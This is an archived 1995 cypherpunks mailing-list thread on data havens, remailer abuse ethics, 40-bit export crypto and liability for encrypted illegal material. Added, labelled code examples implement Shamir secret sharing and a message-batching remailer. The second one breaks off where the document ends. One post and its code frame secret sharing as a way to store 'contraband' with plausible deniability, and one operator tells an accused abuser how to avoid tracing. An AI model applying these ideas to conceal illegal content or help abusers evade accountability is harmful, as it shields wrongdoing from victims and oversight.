From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Mon, 16 Jan 95 18:23:31 PST
To: Robert Rothenberg <unicorn@access.digex.net>
Subject: Re: Another problem w/Data Havens...
Message-ID: <Chameleon.4.01.950116182254.jcorgan@jcorgan.sj.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Data havens that can split data to two or more locations in separate 
>jurisdictions can effectively ignore attention from authorities not 
>related to the site management or site performance.  Encryption mandated 
>sites can also take this stance, while encryption is legal in any event.

It just occurred to me when reading this another method for ensuring the
"I can't tell what's in it" condition with a data haven operator.  Why not
use a secret sharing system where the contraband data is split into a number
of pieces and sent to different havens?  It could be argued that the individual
pieces are not the same as the whole, and there is absolutely no way the
operator could recover the original from a given piece (thus providing
plausible deniability.)

Using M by N secret sharing, with M < N, you build in some redundancy in case
one of the havens gets shut down.

Ok, Eric, go ahead and blast your holes in this argument :)

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                    -Isaac Asimov


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
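
[Added example, not part of the original post: one concrete form of the M-of-N split proposed above, Shamir secret sharing applied byte by byte over the prime field GF(257). The choice of Shamir's scheme, the field, and the function names are assumptions of this example; the post does not name a scheme.]

```python
import secrets
from itertools import combinations

P = 257  # smallest prime above 255, so every byte value is a field element


def _eval_poly(coeffs, x):
    """Evaluate coeffs[0] + coeffs[1]*x + ... modulo P (Horner's rule)."""
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % P
    return acc


def split(data: bytes, m: int, n: int) -> dict:
    """Return {haven_number: share}; any m shares rebuild data.

    Each byte is the constant term of its own random degree-(m-1) polynomial,
    so fewer than m shares are consistent with every possible byte value.
    Share elements range over 0..256 and are kept as lists of ints.
    """
    if not 1 < m <= n < P:
        raise ValueError("need 1 < m <= n < 257")
    shares = {x: [] for x in range(1, n + 1)}
    for byte in data:
        coeffs = [byte] + [secrets.randbelow(P) for _ in range(m - 1)]
        for x in shares:
            shares[x].append(_eval_poly(coeffs, x))
    return shares


def combine(shares: dict, m: int) -> bytes:
    """Rebuild the data from at least m shares by Lagrange interpolation at 0."""
    if len(shares) < m:
        raise ValueError("not enough shares to reconstruct")
    xs = sorted(shares)[:m]
    weights = {}
    for xj in xs:
        num = den = 1
        for xk in xs:
            if xk != xj:
                num = num * (-xk) % P
                den = den * (xj - xk) % P
        weights[xj] = num * pow(den, P - 2, P) % P   # division via Fermat inverse
    length = len(shares[xs[0]])
    return bytes(
        sum(shares[x][i] * weights[x] for x in xs) % P for i in range(length)
    )


def recoverable_from_any_quorum(data: bytes, m: int, n: int) -> bool:
    """True if every choice of m surviving havens reproduces the data."""
    shares = split(data, m, n)
    return all(
        combine({x: shares[x] for x in quorum}, m) == data
        for quorum in combinations(shares, m)
    )


if __name__ == "__main__":
    payload = b"constructed sample payload"        # constructed sample input
    havens = split(payload, 3, 5)
    del havens[2], havens[5]                       # two havens get shut down
    print(combine(havens, 3))
    print(recoverable_from_any_quorum(payload, 3, 5))
```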






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Mon, 16 Jan 95 16:09:41 PST
To: mcip@mcfeeley.cc.utexas.edu
Subject: Announce: ChainMail 0.6b applescript for using anon remailers
Message-ID: <ab40ba9206021004e8c1@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


I've written an applescript for using the cypherpunks-style anon remailers
with Eudora for the macintosh.
It will take a message in Eudora, and construct a chain with MacPGP for
encryption, through remailers you've specified, and then deposit it back in
Eudora for sending.
There are still several features I'd like to add to it, but it's quite
usable in its present incarnation.
You need a scriptable version of MacPGP, scriptable version of Eudora, and
some sundry scripting additions which are listed (with URLs) in the docs.

Send email if you'd like a copy, and I'll mail you a binhex'd copy. I don't
want it on any archive sites yet, because it's not really done, or fully
beta tested for bugs.  (so let that be a warning to you, too.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 16 Jan 95 13:10:55 PST
To: cypherpunks@toad.com
Subject: request for factorising code
Message-ID: <6482.9501161922@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I have had a look at the exported version of Netscape's WWW browser
which has support for secure transfer of info, and it says it uses RSA
keys limited to 40 (not sure whether this is decimal digits or bits).
This is the broken version for export, I am not sure what the
non-crippled version uses.  I would like to have a go at factorising a
number of 40 digits to get a feel for how secure this system is.  I
suspect not very secure; even 40 digits is pretty pitiful for an RSA
key size, and 40 bits would be a joke.  

I would like to get a feel for how long it takes to factorise a 40
digit number.  

Does anyone have source code for factorising large numbers?

I have code to generate the RSA key pairs and modulus, what I am
looking for is code to factorise a number using one of the better
algorithms (quadratic sieve, etc.).

Adam

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

-----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Mon, 16 Jan 95 16:48:08 PST
To: aba@atlas.ex.ac.uk
Subject: Re: request for factorising code
In-Reply-To: <6482.9501161922@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.SUN.3.91.950116194240.21082A-100000@unix3.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Jan 1995 aba@atlas.ex.ac.uk wrote:

> I have code to generate the RSA key pairs and modulus, what I am
> looking for is code to factorise a number using one of the better
> algorithms (quadratic sieve, etc.).

	It's been established that the encryption in Netscape is 40 bit 
RC4, not 40 bit RSA, but if anyone's still looking for the quadratic 
sieve code, look on Derek Atkins' ftp site toxicwaste.mit.edu. Arjen 
Lenstra may have made the large number field sieve (LNFS) code available 
somewhere, but I'm not sure.

--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mclow@coyote.csusm.edu (Marshall Clow)
Date: Mon, 16 Jan 95 19:46:38 PST
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Another internet story: INFO: NBC Nightly News Tonight (fwd)
Message-ID: <ab40edc2000210030d59@[144.37.6.103]>
MIME-Version: 1.0
Content-Type: text/plain


>A story regarding the Internet, with some sort of mention of NRA.org,
>should be on the NBC Nightly News with Tom Brokaw tonight.
>
It did not play out here on the left bank, probably because of the
earthquake in Japan. Maybe tomorrow.

-- Marshall






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Mon, 16 Jan 95 17:27:38 PST
To: Remailer Operators List <Remailer-Operators@c2.org>
Subject: Abuse Complaint out of homer@rahul.net
Message-ID: <Pine.SUN.3.91.950116201426.6889A-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



     Oh, Goody.  I get to deal with my first abuse complaint for my
remailer. 
 
     Seems to me that letting others decide what is or is not abuse
without at least being able to see the abuse myself would be wrong, that
opens the door to just anyone claiming they were abused and my taking
action against the alleged abuser. 
 
     Clearly though if some admin of a system considers something an
abuse, one can not just blow them off, we are all responsible for
responsible use of the net. 
 
     Even if this posting came through a chain, this admin is going to try
to trace back the chain through the other remailers.  So if I give him
the remailer it came from, he is going to pester that remailer operator
who won't appreciate it. 
 
     I will soon be able to install blocking on the To: or From: lines.
Blocking the From lines is hard, because usually abuse comes through other
remailers, so I can't just block that.  I can however block To: lines if
the person is abusing one particular usenet newsgroup or end receiver. 
 
     It would seem that if I am going to take action against someone with
blocking of some sort, then I have at least a right to see the full
posting that is claimed to be abusive. 
 
     By the way, rahul.net keeps syslog files world readable which I find
to be a security leak, as anyone (specifically the Church of Scientology)
could find out who is in communication with me and start to harass them
too. 

     Comments on ethics and diplomatic handling of this would be
appreciated. 
 
     Homer





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 16 Jan 95 18:17:57 PST
To: cypherpunks@toad.com
Subject: Economist on EFF
Message-ID: <199501170217.VAA29809@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The Economist of January 14-20 washes EFF's dirty laundry. 
 
 
After recounting Berman's boot and EFF droop, the article concludes:  "That
leaves cyberspace's radical libertarians without a voice in Washington. 
They're probably delighted." 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Mon, 16 Jan 95 18:22:11 PST
To: Remailer Operators List <Remailer-Operators@c2.org>
Subject: Abuse and Remailer Ethics
Message-ID: <Pine.SUN.3.91.950116205019.7181A-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



     I am surprised there isn't a widely agreed upon codification of
remailer operator ethics for handling abuse cases.

     Perhaps there is, and I would appreciate someone pointing me to it.

     I am not presently on cypherpunks, so please include me in the
replies.
 
     Here is the situation.

     homer@rahul.net runs with header logging on, it contains, From: 
To:, Date: and Subject.  rahul.net also keeps syslog files for a week,
and makes them public to those on rahul.net.
 
     B writes me saying he is the 'admin of a listserv' and complains that
someone is abusing his list with postings through my remailer. He wants
the name and e-mail of the abuser to 'talk to him personally'. 
 
     Clearly I should not give out the name of a remailer user (if I know
it) unless ordered to by a court order. 
 
     Thus his request is, on the surface of it, absurd.
 
     In this case the alleged abuser, A, did not chain his posting so
my logs clearly show who it is.  Clearly I am always going to know the
To: of an abuse because the complaint comes to me from or about that
address.  If the abuser only uses one remailer, then I am clearly
going to know the From: line also, as it is right there in the header
logs or rahul.net syslog files (same thing.)
 
     If the abuser chains and a complaint comes to me, all I will know
about the From: line is that it came from another remailer.  However
now that I know his name and e-mail, if I get another complaint about
him, and he has wised up and started chaining, I could pass his name
onto the prior remailer before mine, and that remailer could do the
same, until it came back to the first remailer on the chain who could
take action.  This however would piss off a lot of remailer operators.
 
     But now what action is appropriate?
 
     Well giving A's name to B is out of the question without a court
order, right?
 
     Blocking the To: line, namely the abused party, is extreme as
that blocks others from posting to that list or group, unless the list
or the group wishes to have no anon messages.  In which case I
probably might consider blocking the end recipient.
 
     Blocking the From: line, will stop all further postings from that
person, which is fitting if indeed he is 'abusing' people, but he will
merely start posting through other remailers, who will then have to go
through the same procedure.  Perhaps there is some justification then for
remailer operators sharing blocked From: lines with each other, that
might be a good idea.
 
     But who is to decide what is or is not abuse?  Surely I can't let
others tell me that they have been abused without even reading the
message, I have seen it happen all too often that parties claim they
are being abused when they are merely being exposed and rightly so.

     On the other hand, since I am responsible for my own little
corner of the net, if something happens that I consider abuse, I
certainly have a right to put an end to it if I can.

     Some questions:
 
     Does any single recipient have the right to demand that they be
blocked from all anon messages.  I would say yes.

     How about demanding blocking anon messages only from some
senders?  That is harder to implement.  If you block the sender, you
block ALL his postings, not just to that party.  So you would need to
block specific From: and To: combinations.  This would not work with
chaining at all, even if we did share blocking information.  So that
is out.

     Does a list owner have the right to demand blocking to his list,
with or without a vote of the list readers?  I would say yes.
     
     What about a newsgroup?  I would say it takes a vote.  Are anon votes
allowed?  Touchy question that was important at one time on 
alt.r.scientology.
 
     Anyhow I would guess that the correct action here is to write the
offender and let him know a complaint has been registered against him.
I would also educate him as to why he was so easily traced and tell
him that if he wants to avoid such in the future to start chaining.

     However if he is a determined abuser not prone to social
embarrassment, then the sharing of blocking among remailer operators
might become a very good idea.

     I don't know how you seasoned reops feel about abuse, jpunix went
out of business for want of an effective way to deal with it.  I think
part of the answer is in close cooperation.  This might help keep the
abuse down, and raise the reputation of reops so that people begin to
think of us as responsible service providers rather than anarcho
terrorists.

     However I am very new to this field, so I may have my head stuck
up my ass, and I would like to hear back from you on your ideas.

     Homer Wilson Smith
     homer@rahul.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hroller@metronet.com (Michael L. Acklin)
Date: Mon, 16 Jan 95 19:53:27 PST
To: Homer Wilson Smith <Remailer-Operators@c2.org>
Subject: Re: Abuse Complaint out of homer@rahul.net
In-Reply-To: <Pine.SUN.3.91.950116201426.6889A-100000@math>
Message-ID: <0hp6lS$TgAh4077yn@metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


Homer,
     I am going to have to agree with you on this. A Sysadmin would have
to see the messages or data that is supposed to be harassing the
complainant. What I say is harassment may be different from what you
say it is.


Michael L. Acklin    ------------>hroller@metronet.com
Finger for Pub Key
or MIT Key Server
PGP Fingerprint: 86 D6 52 87 E4 FD 64  05 63 BA CA AA B8 A9 04




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Mon, 16 Jan 95 19:25:58 PST
To: Homer Wilson Smith <Remailer-Operators@c2.org>
Subject: Re: Abuse and Remailer Ethics
Message-ID: <ab40e69a010210049530@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:21 PM 01/16/95, Homer Wilson Smith wrote:
[snip]
>     Does any single recipient have the right to demand that they be
>blocked from all anon messages.  I would say yes.
>
>     How about demanding blocking anon messages only from some
>senders?  That is harder to implement.  If you block the sender, you
>block ALL his postings, not just to that party.  So you would need to
>block specific From: and To: combinations.  This would not work with
>chaining at all, even if we did share blocking information.  So that
>is out.
>
>     Does a list owner have the right to demand blocking to his list,
>with or without a vote of the list readers?  I would say yes.
>
>     What about a newsgroup?  I would say it takes a vote.  Are anon votes
>allowed?  Touchy question that was important at one time on
>alt.r.scientology.

I agree with all of that.  Somewhat conditionally with what you say about
newsgroups, because while it sounds nice, it would be hard to implement.
I'm tempted to say that a newsgroup, by its nature, doesn't have any
mechanism for control/government, once created.  And as such, doesn't have
any way to "decide" not to accept anonymous posts, or posts from a specific
user or remailer.  So I'm tempted to say "tough luck" to newsgroups that
don't like receiving anonymous posts. The alternative is for people
interested to create a moderated newsgroup, where of course the moderator
could refuse to allow anonymous posts with or without the remailer
operators' cooperation.

>     Anyhow I would guess that the correct action here is to write the
>offender and let him know a complaint has been registered against him.
>I would also educate him as to why he was so easily traced and tell
>him that if he wants to avoid such in the future to start chaining.

Yes, I think that is an excellent course of action.

>     However if he is a determined abuser not prone to social
>embarrassment, then the sharing of blocking among remailer operators
>might become a very good idea.

I'm not so sure about that.   It might become necessary, but blocking
remailer delivery to a particular address is a _much_ more desirable
solution, in my opinion.  If a particular person doesn't want to receive
anonymous mail, fine.  And it might be good to have a mechanism by which he
could make those desires known to all remailers, so he doesn't have to do
it individually.  But if he does want to receive mail from the remailers, I
think he's got to receive all mail from the remailers, and not count on the
remailer operators to play Identity Detective and try to screen out people
he doesn't like.  Same with a listserv and the requests of the listserv
operator.  A newsgroup is, of course, more touchy, because there really
_isn't_ a way for "the newsgroup" to decide not to accept anonymous posts.
And I'm not really sure there should be.

Part of the answer relies on how "independent" your remailer is.  If you
_were_ to take no action at all to people who complain about "abuse", would
you get in trouble? (from school, company, service provider, country). If
you would, then you've got to decide if you are willing to take the heat.
And you're probably not willing to take the heat for Cantor & Siegel to spam
the net.  So you've got to do what you've got to do.  But, personally, if I
ran a remailer on a machine that wasn't subject to political pressure (from
school, service provider, whatever), I would never make any effort to
cooperate with other operators to track down "offenders", and I'd never
exclude any newsgroups from delivery.   Because I wouldn't want to play
censor and decide what "offense" is worth tracking down, and what isn't.
And because even having the _capability_ to track down people is really
dangerous, when you get pressure to track down someone you _don't_ want to
track down.  Much better to say "Can't be done, don't have logs, can't
figure out who it was," than to have to admit "well, I've tracked down 5
people in the past month cause someone complained about them."  Kind of
ruins the point of anon remailers. Best would be to have tracking down be
impossible, and it would be close to, if not entirely, impossible if the
user took the proper precautions.  But even if it's possible, it's
probably best not to develop a mechanism to do it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Mon, 16 Jan 95 19:43:46 PST
To: Johnathan Corgan <jcorgan@scruznet.com>
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <Chameleon.4.01.950116182254.jcorgan@jcorgan.sj.scruznet.com>
Message-ID: <Pine.SUN.3.91.950116223900.25130A-100000@unix3.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Jan 1995, Johnathan Corgan wrote:

> It just occurred to me when reading this another method for ensuring the
> "I can't tell what's in it" condition with a data haven operator.  Why not
> use a secret sharing system where the contraband data is split into a number
> of pieces and sent to different havens?

	Damn it, you beat me to it. :-)

[ ... ] 
> Ok, Eric, go ahead and blast your holes in this argument :)

	I'm not Eric, but hey.

	This entire discussion is completely unnecessary. There are ways 
of removing operator liability without examining the submission at all.

----------
	unix3.netaxs.com:/home/grendel 1/511> host bermuda-gw.alter.net
	bermuda-gw.alter.net has address 137.39.234.130
	bermuda-gw.alter.net mail is handled by relay2.UU.NET
	bermuda-gw.alter.net mail is handled by relay1.UU.NET
	unix3.netaxs.com:/home/grendel 1/512> 
----------

	Nicht wahr?

Michael




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Mon, 16 Jan 95 20:12:21 PST
To: Jonathan Rochkind <jrochkin@cs.oberlin.edu>
Subject: Re: Abuse and Remailer Ethics
In-Reply-To: <ab40e69a010210049530@[132.162.201.201]>
Message-ID: <Pine.SUN.3.91.950116230848.8436A-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



     OK, I understood all this.  I am afraid that if we implement a total
no tracing scenario, then remailers will come under heat from the world at
large and the governments.  Maybe not.  Right now, Rahul (a good guy) is
implementing syslogs whether I want him to or not, and that isn't about to
change.  Really I would have to be the owner of my own system in order to
do what you are suggesting. 

     But then that is what got jpunix shut down. No way to deal with
complaints, and big time abuses going through his server, right JP? 

     But I see the advantage to total no tracing, I am just not sure
all of us are really strong enough yet to implement it and stay
in business.
 
     Homer






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Mon, 16 Jan 95 20:36:44 PST
To: Remailer Operators List <Remailer-Operators@c2.org>
Subject: Remailer Abuse (fwd)
Message-ID: <Pine.SUN.3.91.950116233334.8718B-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



     Here is the message I sent to both the complainant and the complainee.

     Homer


     Dear ..... ,
 
     I have been contacted by someone complaining about a posting you made
through my remailer.  They want me to tell them who you are, which ain't
going to happen, but at the same time I don't like getting complaints, you
understand? 

     Of course I can not tell you who complained any more than I can tell
them who you are.  But you know where you have been posting using my
remailer, right? 
 
     Now I have no idea if what you posted was really abusive or not,
I did not see the posting or postings, and I know a lot of people complain
about 'abuse' when really it's just their closed minds being opened up.
 
     I was able to 'trace' you because you sent something through my
remailer without using chaining.  If you had chained I would never know
who the posting came from.  I was told who it went to and the time, and
it's right there in my system's syslogs coming from you.  If you chain and
use PGP, then I could not have traced you.  So read the instructions on
chaining and make sure you USE it.  You will be a lot safer in the future
from complaint attempts than if you don't use chaining. 
 
     If you have questions on how to chain, ask on alt.privacy.anon-server
or read the various helps at many of the remailers.

     I have reposted this letter to alt.privacy.anon-server without your
name and sent a copy to the complainant.

     I expect not to hear anything more about you, ok?

     Homer Wilson Smith
     System Administrator of Remailer at
     homer@rahul.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: marko@millcomm.com (Mark Oeltjenbruns)
Date: Mon, 16 Jan 95 21:40:34 PST
To: eric@remailer.net (Eric Hughes)
Subject: Does encrypted equal safe?
Message-ID: <m0rU6g1-000kfxC@mill2.millcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


>   At 10:08 PM 1/11/95 -0800, Eric Hughes wrote:

        Edited from response on the 'How do I know if its encrypted?' thread
to get some points in the clear.

>If you can't read it, it's not kiddie-porn *for you*, although it
>might be for someone with the key.
>
        So the fact that it's not kiddie-porn *for me* makes it safe *for me*
to be transporting or storing for others that know it is kiddie-porn?

>Encryption fragments meaning subjectively.  A magazine, for example,
>has a fixed center of meaning for all who can read the language.  A
>magazine looks the same to all who look at it.  An encrypted file
>looks different to those who have the key from those who do not.
>
        But why does the meaning of the data assume to change?  If I take my
stack of kiddie-porn and put it in a box with a big strong lock on it, in a
way physically encrypting it, change the meaning of what I have?  I now have
a locked box that looks different from my original.

>Encrypted data is fundamentally different from paper-and-ink data in
>this way.  The metaphor of "planting it on somebody" does not apply to
>data that the "somebody" can't read.

        It is fundamentally a different process, but does that make it
different from the locking the physical data in a box as above?
>
>[...] If you can't easily read it, you
>can't be expected to have read it.  The operator of a data service has
>_zero_ motivation to cryptanalyze something.  If they happen to apply
>a viewer to the file (for whatever reason), they don't _want_ to see
>what's inside.
>

        It seems to me that what you are saying is that because the data is
in a form that I can't understand, I'm safe from trouble.  Now it seems to
me that this is not all that different from changing the form or appearance
of physical data and saying I'm not responsible for it.  
        Now think of a remailer:  If somebody gave me this box of stuff,
stuff that I had no idea of what it was since it was *locked up*, to
transport over to location X and I got busted half way there am I safe?
Would the argument that I didn't know what it was hold up?  I would tend to
say no.  If the answer was yes, which is what some current arguments seem
to indicate, what does that say about responsibility towards spamming or
remailing illegal data?  Can I say that even though someone is using me to
spam or distribute kiddie porn, I have no reason to try and stop it since I
don't know what they are doing?  If I did take it upon myself to stop the
abuse wouldn't I need to analyze the incoming data to stop it?  Something
I'm not supposed to do.
        A Data Haven:  It is illegal to handle certain items in the physical
world.  I can get in some trouble if I have kiddie porn or drugs or what not
in my possession.  This is true, for most things I would guess, even if I was
just 'holding it for someone else.'  After all, how do I prove that somebody
else put illegal articles, encrypted or not, on my 'site' and it didn't
actually come from me?  Does 'holding it for someone else' type arguments
work in net.world better than in the physical world?  Once again, current
arguments would say yes, it is different and I'm safe to hold onto illegal
data since I don't know what it is.
        Let's see if I got this straight.  In my own words, I'm just as
responsible for the data I massage as the person I'm doing it for judging by
real world parallels, encrypted or not.  Now I would hope this is not the
case, since being a remailer operator would mean that if somebody starts a
spam using my site I would be just as responsible as the person that started
it.  Having kiddie porn on my DH would be illegal even if I had no idea it
was present.  This doesn't sound too good, since many of the uses of my
services would be restricted if I wanted to stay 'safe.'  After all if I
wasn't as responsible for the spam and was safe from harm, or guilt, about
what people used my site for I wouldn't care what went through my system,
I'm not really supposed to care what people send me right?  In fact I may
even take pride that my system is being used so much. ;-)  But this doesn't
seem to be the case, nor in some regards would I hope them to be.
        Now I'm getting confused.  There seems to be some contradictions in
some of the above that need to be worked out, or at least explained to me.
Some pretty serious legal problems seem to be lurking within.  It just
doesn't seem as cut and dry to me as the argument that if I don't know what
it is I don't have to worry about it.  I'm sure others will have some
comments to help me sort this out.

-Mark
----------
Mark Oeltjenbruns  marko@Millcomm.com   N0CCQ
SnipIt Research    Finger for PGP key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Mon, 16 Jan 95 22:23:57 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <9501160118.AA05350@snark.imsi.com>
Message-ID: <Pine.3.89.9501170010.A11119-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Jan 1995, Perry E. Metzger wrote:

> 
> rishab@dxm.ernet.in says:
> > WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter
> > member of the cypherpunks - a term that she coined." I didn't even know there
> > _was_ a charter.
> 
> Or a Jude Milhon, for that matter. Another example of the continuing
> decay of a once proud magazine...
>
Uhm, this is funny 8)

Jude is the patron saint of a losing battle, the one to keep the Internet 
free, and to fuck with media as much as possible when it brings fun.  And 
the gravy whick dominatrix, all rolled into a few.

she's also a friend so watch it punk 8)
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Tue, 17 Jan 95 00:53:03 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Jude Milhon in WIRED
In-Reply-To: <199501161819.KAA14478@netcom19.netcom.com>
Message-ID: <m0rU9dt-0004JdC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> Anyway, many of the folks "Wired" and the other hype-zines interview
> are indeed strange and marginal. To be expected. There are only so
> many of the standard "talking heads" that can be interviewed (the
> stand-bys like Engelbart, Nelson, Toffler, Pournelle, etc.).
> 
> Frankly, I'd rather see a story on "Zippies," about which I'd heard
> nothing substantive before, than Yet Another Ted Nelson Story, about
> which I've heard entirely too much over the past decade. (Not to
> insult Ted--Hi, Ted!--but there are only so many ways to tell the
> Xanadu story...time for new approaches.)
> 
> I know some folks in the crypto/PGP community who were quite miffed
> that such "marginal" folks as Eric Hughes, John Gilmore, and I were
> featured on the cover of "Wired" 1.2 two years ago...they naturally
> saw themselves as being more worthy, as perhaps they were....such is
> life. The "credit assignment problem" in evolution and genetic
> programming remains a tough one.

I'm not sure that that's the case. Just because you move in dramatically
politically incorrect circles (no insult intended) you may tend to get
interviewed more than, say, I would.  The fact that I might be working on
more important or interesting things is completely irrelevant. 
Cypherpunks is 'hot', so the press goes to who are perceived to be the
'movers and shakers' and they are talked to. The people working behind the
scenes on stuff often are ignored in deference to those who are more
visible.  Again, no insult intended, but I think there's a large measure
of truth in it.  The same people keep getting the press while the larger
bulk of the population gets ignored.  It's also geographically-oriented, 
too - the folks on the West Coast tend to get the majority of the press, 
followed by the East Coast.  Anyone in between is basically ignored.  I 
guess the press thinks that no one outside of Silicon Valley or Boston is 
working on anything of any substance.  Hell, look at Linux - that was 
done by a guy in Finland, and a college student at that.  I'll bet that's 
rather embarrassing to the "hot shots" in Cupertino :)
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Mon, 16 Jan 95 23:37:38 PST
To: hroller@metronet.com
Subject: Re: Abuse Complaint out of homer@rahul.net
Message-ID: <9501170734.AA09389@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael wrote, to Homer and the lists
>      I am going to have to agree with you on this.
> A Sysadmin would have to see the messages or data that is 
> supposed to be harassing the complainant.  What I say is harassment
> may be different from what you say it is.

There's different levels of harassment.  For the kind that says
1) "Don't send me any of this junk mail any more", 
if the recipient wants to define junk mail to the remailer-operator, 
there's no ethical problem if the operator wants to block remailed mail
to the recipient, though it's good form in non-remailer-chain
environments for the operator to issue a bouncegram if possible.
If the recipient has to pay per byte/message to receive mail,
or the amount transmitted is really excessive, then this is
certainly something an operator ought to do to avoid problems.

(It's potentially bad form for a for-profit operator to cash
digicash postage for delivering the messages if he doesn't,
at least without a warning in his pricing policy advertisement.)

If the operator doesn't want to block remail to an unwilling
recipient, the ethical and legal questions become more interesting.
The question of whether the "don't bug me" list gets published
is also interesting.

For the kind of harassment complaint that says 
2) "Block all remail to me from this destination",
there are implementation issues - can the remailer perform
checks like this before doing the header-munging?
Is there more security risk? Of course, with chaining,
it's a lot less useful.

For the kind of complaint that says
3) "Block all remail to this group of people",
there's the question of whether the requester is authorized
to request that for the entire group - newsgroups are an
especially interesting problem.  Julf's remailer blocks
posting to some newsgroups, because the readers have done
the usual net.poll and decided they'd like him to block it,
since lots of the remail was spam.  But especially with newsgroups,
it's easy for the recipient to trash incoming articles from the remailers.

		Bill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Mon, 16 Jan 95 23:44:56 PST
To: jrochkin@cs.oberlin.edu
Subject: Re: Abuse and Remailer Ethics
Message-ID: <9501170741.AA09451@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


>      OK, I understood all this.  I am afraid that if we implement a total
> no tracing scenario, then remailers will come under heat from the world at
> large and the governments.  Maybe not.  Right now, Rahul (a good guy) is
> implementing syslogs whether I want him to or not, and that isn't about to
> change.  Really I would have to be the owner of my own system in order to
> do what you are suggesting. 

You can do a good job of anonymous remailing even on a system that
keeps email logs, if the system is otherwise trustable.
When mail comes in to your remailer, store it in a file (encrypted....).
Periodically take the files of stored messages, shuffle them,
and mail them out.  It's about the same behavior as doing the same
from your own box with eavesdroppers on your network, though
the traffic levels are a bit different if each remailer operator
on rahul.net gets identified separately instead of all the remailers
getting lumped together.  But if there are multiple remailers on
Rahul's machine, and if the syslogs don't log internal mail,
you could also forward some of the remailer traffic randomly
through other remailer-operators there.

		Bill
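
The store, shuffle and mail-out scheme from the message above, as an added example that is not part of the original thread. It models what a host mail log would still record and how large the set of possible senders becomes once deliveries are batched; the class and function names, the log layout and the example.* addresses are assumptions constructed for illustration.

```python
import secrets


class BatchingRemailer:
    """Hold incoming mail in a pool and release it in shuffled batches."""

    def __init__(self, rng=None):
        self.rng = rng or secrets.SystemRandom()   # OS-backed randomness
        self.pool = []     # stored messages (the post suggests keeping them encrypted)
        self.syslog = []   # assumed host log layout: (time, direction, address)

    def receive(self, now, sender, recipient, body):
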